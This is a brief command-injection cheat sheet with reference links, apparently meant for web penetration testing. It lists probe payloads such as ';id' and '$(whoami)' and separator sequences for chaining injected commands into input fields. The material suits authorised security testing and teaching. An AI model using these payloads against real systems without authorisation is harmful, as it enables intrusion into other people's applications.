# OS Command Injection

## Identification

```
;id
;id;
;id|
|id
| ls /
& whoami
`whoami`
$(whoami)
```

## Initial sequence

Follow the initial sequence by your OS command payload

```
&
&&
|
||
;
"
";
'"
';
%0a
%0d%0a
\0
\n
\r
*;
```

## References

<https://portswigger.net/web-security/os-command-injection>

<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection>